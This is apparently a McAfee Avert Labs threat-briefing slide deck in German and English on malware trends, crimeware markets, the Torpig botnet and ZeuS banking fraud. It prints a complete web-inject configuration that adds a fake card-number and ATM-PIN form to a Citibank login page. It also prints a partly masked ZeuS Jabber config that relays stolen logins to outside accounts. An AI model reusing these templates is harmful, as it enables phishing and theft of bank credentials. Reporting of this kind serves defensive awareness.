April 10, 2023

Malware - ThreatsTrends, Bedrohungen, Entwicklungen

Toralv DirroMcAfee Avert Labs EMEA Security Strategist

April 10, 20232

Aktueller Wetterbericht

April 10, 20233

Weltweit bei den Avert Labs:

• Aktuell $zu_grosse_Zahl unterschiedliche Stücke Malware von Avert Labs identifiziert

• Wir haben aufgehört zu zählen, die alte Methode macht keinen Sinn mehr:

• 50000+ Samples werden täglich analysiert

• 95% und mehr sind Statisch (nicht selbstreplizierend) – Trojaner und Bots

• 90% und mehr sind gepackt/verschlüsselt– “Runtime Packer”

April 10, 20234

Gesamtzahl Samples

Quelle: AV-Test.org

April 10, 20235

Global Malware Vision

(Cumulative)

• Collections: The Great Zoo

Q1-2009: +4.2 million samplesQ2-2009: +4.1 million samples

April 10, 20236

Selbstreplizierende und Statische Malware

0%

10%

20%

30%

40%

50%

60%

70%

80%

90%

100%

1999 2000 2001 2002 2003 2004 2005 2006 2007 2008

April 10, 20237 7

Rootkits werden die Regel, nicht die Ausnahme

Detection Name Total

Backdoor-AWQ 64927W32/Nuwar@MM 16188Downloader-BAI 4213

Backdoor-CKB 1077Backdoor-BAC 834

April 10, 20238

Motivation Gestern

April 10, 20239

Motivation Heute

Source: Chat Interview mit “Dream Coders Team”, den Entwicklern von MPack http://www.robertlemos.com/2007/07/23/mpack-interview-chat-sessions-posted/

April 10, 202310

Today’s Threat Landscape

10

Increase in malware code added from 07 - 08

500%More Malware

Variations

Malware is obfuscated80%

Toolkits & Obfuscation

New malicious website detected60

SecondsWeb 2.0

is the Catalyst!Of all threats are financially

motivated

90%

Active new zombies per month5m Attack Target

Users vs. Machines

April 10, 202311

Öffentliche Handelsplattformen

April 10, 202312

Und das traurige Resultat

April 10, 202313

Der Untergrund Marktplatz

Bank Logons

• A Washington Mutual Bank account in the U.S. with an available balance of $14,400 is priced at 600 euros ($924), while a Citibank UK account with an available balance of 10,044 pounds is priced at 850 euros ($1,310).

• It may appear to be less dangerous to resell access to a bank account rather than to use it directly.

April 10, 202314

Die Tools

April 10, 202315

The Malware Toolkit Marketplace

Crimeware(Author)

Description Pricing

FirePack(Diel)

Web Exploitation Malware KitNote: a Chinese version exists

$3000 (February 2008)$300 (April 2007)

Zupacha, ZeuS and ZUnker($ash)

The ZeuStrojan is able to inject code into login webpage of financial organization to ask personal data and divert them to a remote location. Zupacha is a bot element, and Zunker a C&C.

$1000 for Zupacha,$2000 for Zunker (January 2008)

Adrenaline, an update of Nuclear Grabber(Corpse)

Universal kit for creating tools to capture targeted banking data. Able to intercept and retransmit authentic transactions on the fly between the bank and its client.

$3000

PolySploit, an update of NeoSploit(Grabarz)

Web Exploitation Malware Kit, statistical engine, enhanced configuration capability, exploitation package , enhanced support and online forum for customers.

100 €

El fiesta Web Based and PDF-Exploit Pack used to launch attacks and monitor them. $850 (December 2008)

Turkojan RAT(AlienSoftware)

A Remote Access Tool made in Turkey. Bronze edition: $99 (July 2008)Silver edition: $179Gold edition: $249

ZoPack Web Based PDF-Exploit Pack used to launch attacks and monitor them..

Source: McAfee Avert Labs

15

April 10, 202316

CaaS – Crimeware as a Service

Service Description Prices Encountered

Proxy Rental Botnet networks on a “Per use” (on a monthly basis) or “daily rates” (on a daily basis, over a month) plans.

Daily Limit 50, Qty per Month 1500: $95Per Use Plan, Qty per Month 1000: $69.95

Web Injection Shop HTML injection codes designed to steal information from customers of dozens of financial institutions worldwide. Each HTML injection is specifically tailored to match each bank’s specific website design.

Each between $10 and $30

Spam facilities Spamming tools, mailing lists, etc. 5000/7000 emails per minute, over 1 million emails per day: $2000 per month

Botnet management HTTP Command & Control facilities for ZeuSmalware. $50 per month

Flooding/DDoS Complete paralysis of your competitor by flooding•his stationary or mobile phone•his web site

$80 per 24h

1 hour: $20 ; 1 day: $100Large projects: $200

Source: McAfee Avert Labs

16

April 10, 202317

Passwörter hacken? Wozu??!

April 10, 202318

Shark: Compilable multi system back door Trojan

April 10, 202319

Beispiel einer Konfigurations-Datei

<inject

url="citibank.com"

before="name=password></TD></TR>"

what="

<TR><TD colspan=3 class=smallArial noWrap></TD></TR>

<TR><TD colspan=3 class=smallArial noWrap>

<SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>

<TR><TD colspan=3 class=smallArial noWrap></TD></TR>

<TD noWrap colSpan=2><B>Your ATM or Check Card Number:</B></TD>

<TD class=smallArial noWrap align=right></TD></TR>

<TD class=username colSpan=3><INPUT id=cc type=text maxlength=16 size=16 value='' name=cc></TD></TR>

<TD noWrap colSpan=2><B>Expiration Date:</B></TD>

<TD class=smallArial noWrap align=right>(e.g. 07.2007)</TD></TR>

<TD class=username colSpan=3><INPUT id=expdate type=text maxlength=7 size=7 value='' name=expdate></TD></TR>

<TD noWrap colSpan=2><B>ATM PIN:</B></TD>

<TD class=smallArial noWrap align=right></TD></TR>

<TR>

<TD class=username colSpan=3><INPUT id=pin type=password size=4 maxlength=4 value='' name=pin></TD></TR>

"block="sign-on."

check="pin"

quan="4"

content="d"

>

</inject>

April 10, 20232020

√ΩUser ist auf seiner Bank Webseite

SSL Zertifikat ist valide, Schloss wird angezeigt

Torpig injiziert in den Browser ein Form, das nach zusätzlichen Informationen fragt – im selben Stil wie die Webseite

April 10, 202321

Delivery

April 10, 202322

Email Attachments – nach wie vor häufig

April 10, 202323

Spear Phishing: “Whaling”

“The United States Tax Court has received many telephone calls regarding an e-mail which purports to originate from the Court being sent by a member of the Tax Court’s practitioner bar. This message is an example of “Spear Phishing,” which is an e-mail spoofing attempt that targets a specific organization. The Tax Court is not disseminating any e-mail notice to anyone who currently has a case before this Court.”

April 10, 202324

Web 2.0

Emails werden durch Links in Social Networks ersetzt

April 10, 202325

Koobface vorbei am Contentfilter… Nutzt Vertrauen

April 10, 202326

Autorun Würmer

Weitgehend ignoriert – bis Conficker kam

April 10, 202327

Autorun ist heute ein bedeutender Infektionsweg

April 10, 202328

Anatomie eines Angriffes: Torpig botnet

28

Wird ein Bot

Opfer System

GET/

Web Server mit Sicherheitslücke

1

<iframe>2

Mebroot drive-by-download Server

GET/?gnh5(request JS code)

3

Launches exploitsgnh5.exe downloadedInstalls Mebroot, injects DLL

4

Mebroot C&C server

5

TorpigDLLs injected into IE, Firefox, Outlook, Skype, IM, etc.

6

Torpig C&C server

Gestohlene Daten alle 20 min hochladen

7

Config file containing bank domains, new C&C servers300 domains for target FIs

8

Injection serverURL9

Phishing HTML 10

Alle 2 Stunden

ZeuS - “human” MITM – Step 1

Maintenance, bitte warten…

ZeuS - “human” MITM – Step 2

Zur Sicherheit etwas Mathe…

ZeuS - “human” MITM – Step 3

Sicherheitshalber die Mobiltelefonnummer bitte

ZeuS - “human” MITM – Step 4

Bestätigen mit iTAN 10

ZeuS - “human” MITM – Step 5

Erfolgreich hinzugefügt (wozu auch immer)

ZeuS - “human” MITM – Step 6

Bedauerlicherweise wegen Wartungsarbeiten heute geschlossen

ZeuS - “human” MITM Admin Panel

ZeuS – mit Instant Messaging

ZeuS Jabber Add-on

[im]server=jabber.ruusername=glom***password=qazx*****to=thekl***@jabber.ruto1=icq12***@jabber.ruto2=tank56***@jabber.ru; name=mask; mask [keylist];key1="login="key2="injtoken="key3="inja1="[list];test1=*onlineeast*.bankofamerica.com*

April 10, 202337

Malware / Crimeware

• URLZone• The Trojan calls back to its command and control server for specific

instructions on exactly how much to steal from the victim's bank account without raising any suspicion, and to which money mule account to send it the money. Then it forges the victim's on-screen bank statements so the person and bank don't see the unauthorized transaction.

http://vil.nai.com/vil/content/v_237377.htm (Downloader-BQZ.a)

http://www.darkreading.com/database_security/security/client/showArticle.jhtml?articleID=220300592

37

This statement shows a transaction of 53.94 Euros when actually 8,571.31

Euros was removed from the account. The balance has been changed by the

Trojan.(http://www.geek.com/articles/news/

malware-now-covers-its-tracks-in-bank-statements-20090930/)

April 10, 202338

Is Your Computer Infected(by a Fake Anti-Virus) ?

38

Q1Q2

Q3

April 10, 202339

They Are Popular Because They Work and Look Valid

April 10, 202340

People and Economy behind it

April 10, 202341

April 10, 202342

Good at Crime, clueless about Security

• Goal: Tracking distribution sites

• Discovered: Everything– „Product lists“

– Tech Support Calls

– Project Documentation

– Affiliate Lists

– Sourcecode

– Employee lists

– And much more....

April 10, 202343 43

FOCUS 09Anatomy of a scareware company

http://www.internetnews.com/security/article.php/3842936/McAfee+FOCUS+09+Anatomy+of+a+Scareware+Scam.htm

Using more than 63 gigabytes of information culled from querying the company's own portal servers and other publicly available data, Dirk Kollberg, from McAfee Labs, unearthed some astonishing operational details including the following:

• Innovative Marketing used more than 34 different production servers in less than six months and used as many as six different servers at a time to infect, advertise and sell their illicit wares.

• In one 10-day stretch, the company received more than 4 million download requests, meaning that at least 4 million people tried to buy the worthless applications.

• Internal documents report that the URLs used to hawk the scareware are only valid for 15 minutes, making it all but impossible for federal, state or international law enforcement agencies to yank the offending URLs before they've moved on to new addresses.

• It used multiple customer call centers, including at least one in Poland and one in India, to service unsuspecting customers calling via VoIP connections to buy, remove or question the need for the unnecessary scareware. And, believe it or not, they recorded and saved these bogus customer service calls. More incredibly, 95 percent of callers exited were "happy" when the call concluded.

• Because they needed an extensive network of ISPs to pull off the scam, Innovative Marketing kept detailed spreadsheets with all the ISPs pertinent data including price, location and, most telling, a column that rate the ISPs "abuseability"—essentially an assessment of which ISPs would play ball and not ask questions as they went about their business.

• The company added a whopping 4.5 million order IDs, essentially new purchases, in 11 months last year. With most of the phony applications selling for $39.95, that's more than $180 million in less than a year.

April 10, 202344

Fragen? Mehr Info?

• Read the Avert Labs Security Blog– http://www.avertlabs.com/research/blog

• Listen to the AudioParasitics Podcast– http://www.audioparasitics.com

• Read the Monthly Spam Report– http://www.mcafee.com

• Read the McAfee Quarterly Threat Report– http://www.mcafee.com

• Read the McAfee Security Journal– http://www.mcafee.com

• Watch the Stop H*Commerce Series– http://www.stophcommerce.com